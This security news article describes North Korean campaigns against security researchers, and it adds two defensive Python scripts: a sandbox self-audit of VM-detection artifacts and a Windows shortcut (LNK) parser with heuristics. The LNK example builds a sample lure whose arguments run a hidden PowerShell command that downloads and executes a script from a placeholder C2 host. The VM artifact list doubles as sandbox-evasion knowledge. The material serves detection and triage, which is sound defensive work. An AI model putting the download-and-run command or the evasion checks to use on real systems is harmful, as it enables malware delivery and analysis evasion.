Zero-Day Exploits: Cybersecurity Researchers Under Attack

Wajahat Raja

September 20, 2023 - TuxCare expert team

Threat actors linked to North Korea have spent recent weeks targeting security researchers, and this time they are armed with zero-day exploits. The attackers compromise researchers' systems by exploiting at least one zero-day vulnerability in a widely used software package. Google's Threat Analysis Group (TAG), which uncovered the activity, has reported the bug to the affected vendor, and a fix is in progress.

 

The Deceptive Approach: Building Trust on Social Media

 

The North Korean actors' approach starts with patience rather than malware. They set up fake personas on prominent social media platforms such as X (formerly Twitter) and Mastodon and use them to strike up conversations with potential targets, often long exchanges about supposedly shared security research interests. Once contact is established on social media, they move the conversation to an encrypted messaging service such as Signal, WhatsApp or Wire.

The social engineering does the hard work. Having earned the researcher's trust, the actors eventually send a malicious file that carries at least one zero-day exploit for a popular software package. The affected vendor has been notified and the vulnerability is being patched.

The Payload: Anti-Virtual-Machine Checks and Exfiltration

 

Once the exploit succeeds, the payload runs a series of checks to detect whether it is executing inside a virtual machine (VM). It then sends the information it has gathered, together with a screenshot, to an attacker-controlled command-and-control domain. The anti-VM checks are a sandbox-evasion measure: a payload that recognises an analysis VM can stay quiet, while the screenshot and system details tell the operators whether they have landed on a real researcher's workstation.
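The practical question for a defender is which artifacts their own analysis VM leaks to checks like these. The script below is an added example, not code from Google TAG or from the payload it analysed: TAG does not list the specific tests the payload runs, so these are the generic checks commodity malware uses (hypervisor MAC OUIs, SMBIOS vendor strings, guest-tool processes, undersized or freshly booted hardware). `HostFacts`, `vm_artifacts` and the two sample hosts are constructed for this example so it runs offline.

```python
"""Sandbox self-audit: what would a VM-aware payload see on this host?

Added example, not code from Google TAG or from the payload it describes.
The checks are the generic ones commodity malware uses; the two sample hosts
are constructed. On a real analysis VM you would populate HostFacts from WMI
(Windows) or /sys/class/dmi and /proc (Linux).
"""
from dataclasses import dataclass

# OUIs registered to hypervisor vendors; a payload only needs the first 3 bytes.
VM_MAC_OUIS = {
    "08:00:27": "VirtualBox",
    "00:05:69": "VMware", "00:0c:29": "VMware", "00:1c:14": "VMware", "00:50:56": "VMware",
    "00:15:5d": "Hyper-V",
    "52:54:00": "QEMU/KVM",
}
# Substrings looked for in SMBIOS BIOS vendor / system manufacturer / product strings.
VM_VENDOR_STRINGS = ("innotek", "virtualbox", "vmware", "qemu", "xen", "bochs",
                     "kvm", "parallels", "virtual machine")
# Guest-additions processes that only exist inside a VM.
VM_PROCESSES = {"vboxservice.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe",
                "vmwareuser.exe", "prl_tools.exe", "qemu-ga.exe"}


@dataclass
class HostFacts:
    mac_addresses: list[str]
    bios_vendor: str
    system_manufacturer: str
    system_product: str
    processes: list[str]
    cpu_count: int
    ram_gb: float
    disk_gb: float
    uptime_minutes: float


def vm_artifacts(h: HostFacts) -> list[str]:
    """Return one line per artifact that would tell a VM-aware payload it is being analysed."""
    hits = []
    for mac in h.mac_addresses:
        vendor = VM_MAC_OUIS.get(mac.lower()[:8])
        if vendor:
            hits.append(f"MAC {mac} carries the {vendor} OUI")
    for label, value in (("BIOS vendor", h.bios_vendor),
                         ("system manufacturer", h.system_manufacturer),
                         ("system product", h.system_product)):
        if any(s in value.lower() for s in VM_VENDOR_STRINGS):
            hits.append(f"{label} '{value}' names a hypervisor")
    for proc in h.processes:
        if proc.lower() in VM_PROCESSES:
            hits.append(f"guest-tools process {proc} is running")
    # Resource checks: real workstations rarely look this small or this new.
    if h.cpu_count < 2:
        hits.append(f"only {h.cpu_count} CPU core")
    if h.ram_gb < 4:
        hits.append(f"only {h.ram_gb} GB RAM")
    if h.disk_gb < 80:
        hits.append(f"only {h.disk_gb} GB disk")
    if h.uptime_minutes < 10:
        hits.append(f"booted {h.uptime_minutes} minutes ago")
    return hits


# Constructed sample: a stock VirtualBox analysis VM straight after a snapshot restore.
STOCK_VM = HostFacts(
    mac_addresses=["08:00:27:4A:1F:9C"],
    bios_vendor="innotek GmbH", system_manufacturer="innotek GmbH", system_product="VirtualBox",
    processes=["explorer.exe", "VBoxTray.exe", "VBoxService.exe"],
    cpu_count=1, ram_gb=2, disk_gb=40, uptime_minutes=3,
)
# Constructed sample: the same VM after the usual hardening (spoofed OUI and SMBIOS
# strings, guest additions removed, bigger virtual hardware, left running for days).
HARDENED_VM = HostFacts(
    mac_addresses=["3C:52:82:7B:20:11"],
    bios_vendor="American Megatrends Inc.", system_manufacturer="Dell Inc.",
    system_product="OptiPlex 7090",
    processes=["explorer.exe", "chrome.exe", "OUTLOOK.EXE"],
    cpu_count=4, ram_gb=16, disk_gb=256, uptime_minutes=4320,
)

if __name__ == "__main__":
    for name, host in (("stock", STOCK_VM), ("hardened", HARDENED_VM)):
        found = vm_artifacts(host)
        print(f"{name}: {len(found)} artifact(s)")
        for line in found:
            print("  -", line)
```

The screenshot the payload exfiltrates deserves the same treatment as the hardware checks: a freshly restored sandbox with an empty desktop and no open windows looks as artificial as a 40 GB disk, so open a few documents and a browser before detonating a sample you expect to phone home.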

 

One of the attacker-controlled X accounts, now suspended, had been active since at least October 2022, which shows how much time the actors invested in building credible personas. The same account had published proof-of-concept (PoC) exploit code for high-severity Windows kernel privilege-escalation vulnerabilities such as CVE-2021-34514 and CVE-2022-21881, exactly the kind of content that earns credibility with other researchers.

 

A Recurring Pattern: Collaboration-Related Lures

 

This is not the first time North Korean actors have gone after the security community. In July 2023, GitHub disclosed a campaign in which fake personas targeted the cybersecurity sector by inviting victims to collaborate on GitHub repositories and then persuading them to clone and execute malicious code.

 

Google TAG also found a standalone Windows tool named GetSymbol that the attackers wrote and published on GitHub. Its advertised purpose is legitimate, fetching debugging symbols from the Microsoft, Google, Mozilla and Citrix symbol servers for reverse engineers, but it also has the ability to download and execute arbitrary code from a command-and-control (C2) domain. A genuinely useful utility published under a plausible developer persona makes an effective secondary infection vector: a researcher who declined the malicious file may still install the tool.

 

A Broader Threat Landscape

 

The finding lines up with research from the AhnLab Security Emergency Response Center (ASEC), which observed ScarCruft, another North Korean state-sponsored actor, using LNK (Windows shortcut) file lures in phishing emails. The shortcuts drop a backdoor capable of exfiltrating sensitive data and executing commands on the victim's machine.
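The triage step a defender wants for lures like these is to recover what the shortcut will actually run without double-clicking it. The script below is an added example, not code from ASEC or from this article: a small parser for the MS-SHLLINK binary format (header, optional LinkTargetIDList and LinkInfo skipped by size, then the StringData fields) plus a few heuristics that typical LNK lures trip. The parser (`parse_lnk`), the heuristics (`suspicious_indicators`), the builder used to construct the sample (`build_lnk`) and the sample shortcut with its fictitious `c2.example.invalid` host are all assumptions of this example; the real ScarCruft shortcuts are not on the page.

```python
"""Triage a .lnk lure: pull out what it will run when double-clicked.

Added example, not code from ASEC or from the article. The sample shortcut is
constructed with build_lnk(); its C2 host is fictitious.
"""
import re
import struct
from dataclasses import dataclass

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-000000000046}
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
# StringData fields appear in this fixed order, each only if its flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # window opens minimised and without focus: a favourite of lures


@dataclass
class Shortcut:
    show_command: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def _read_string(data: bytes, off: int, unicode: bool) -> tuple[str, int]:
    (count,) = struct.unpack_from("<H", data, off)  # CountCharacters, no terminator
    off += 2
    if unicode:
        return data[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return data[off:off + count].decode("cp1252"), off + count


def parse_lnk(data: bytes) -> Shortcut:
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("bad HeaderSize; not a shell link")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad LinkCLSID; not a shell link")
    (flags,) = struct.unpack_from("<I", data, 20)
    (show_command,) = struct.unpack_from("<I", data, 60)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    sc = Shortcut(show_command=show_command)
    for flag, field_name in STRING_FIELDS:
        if flags & flag:
            value, off = _read_string(data, off, bool(flags & IS_UNICODE))
            setattr(sc, field_name, value)
    return sc                                # ExtraData blocks after this are ignored


SCRIPT_HOSTS = ("cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe")


def suspicious_indicators(sc: Shortcut) -> list[str]:
    """Heuristics that legitimate shortcuts rarely trip but LNK lures usually do."""
    hits = []
    target, args = sc.relative_path.lower(), sc.arguments.lower()
    if target.endswith(SCRIPT_HOSTS):
        hits.append(f"target is a script host: {sc.relative_path}")
    if sc.show_command == SW_SHOWMINNOACTIVE:
        hits.append("window opens minimised and unfocused (SW_SHOWMINNOACTIVE)")
    if re.search(r"-w(?:indowstyle)?\s+hidden", args):
        hits.append("PowerShell asked for a hidden window")
    if re.search(r"(?<!\w)-e(?:c|nc|ncodedcommand)?\b", args) or "frombase64string" in args:
        hits.append("encoded command in arguments")
    if re.search(r"downloadstring|downloadfile|invoke-webrequest|https?://", args):
        hits.append("arguments fetch something from the network")
    if len(sc.arguments) > 260:
        hits.append(f"unusually long arguments ({len(sc.arguments)} chars)")
    return hits


def build_lnk(relative_path: str, working_dir: str, arguments: str,
              show_command: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Construct a minimal Unicode shell link (header + StringData only) for testing."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20,            # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,         # creation / access / write FILETIME
                         0, 0,            # FileSize, IconIndex
                         show_command, 0, 0, 0, 0)   # HotKey, Reserved1..3
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body


# Constructed lure: hidden PowerShell pulling a second stage from a fictitious C2 host.
SAMPLE_LURE = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    working_dir=r"C:\Windows\System32",
    arguments="-windowstyle hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://c2.example.invalid/stage.ps1')\"",
)

if __name__ == "__main__":
    sc = parse_lnk(SAMPLE_LURE)
    print(f"target={sc.relative_path!r} args={sc.arguments!r} show={sc.show_command}")
    for line in suspicious_indicators(sc):
        print("  !", line)
```

Point `parse_lnk` at the bytes of a suspicious shortcut. The parser stops after the StringData fields and ignores the ExtraData blocks; a shortcut that is hundreds of kilobytes long almost certainly carries a payload appended after them, which is why lures often pair a hidden PowerShell window with arguments that read the .lnk back from disk, and why the argument-length check is there.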

Separately, Microsoft recently reported that several North Korean threat actors are targeting the Russian government and defence sector, most likely for intelligence collection, even as Pyongyang supports Russia's war against Ukraine. That breadth of activity shows how adaptable and varied North Korean cyber operations are, and it underlines the need for defences that do not depend on a patch already being available.

 

Beyond Espionage: Funding the State

 

Espionage is not the only objective. The FBI has attributed the theft of roughly $41 million in virtual currency from Stake.com, an online casino and betting platform, to the Lazarus Group, another North Korean actor. The case is a reminder that North Korean cyber operations serve two goals at once: collecting intelligence and raising cryptocurrency funds for the state.

 

Conclusion

 

North Korean threat actors use a wide range of techniques, from zero-day exploits to phishing, to achieve their goals. Security researchers are an attractive target because of the vulnerability research and proof-of-concept code they hold, so they should treat unsolicited collaboration offers with suspicion, open files from new contacts only in an isolated environment, and keep the tools they use for analysis fully patched. These campaigns also underline the need for international cooperation and information sharing to blunt the impact of hostile operations.

The sources for this piece include articles in The Hacker News and BleepingComputer.
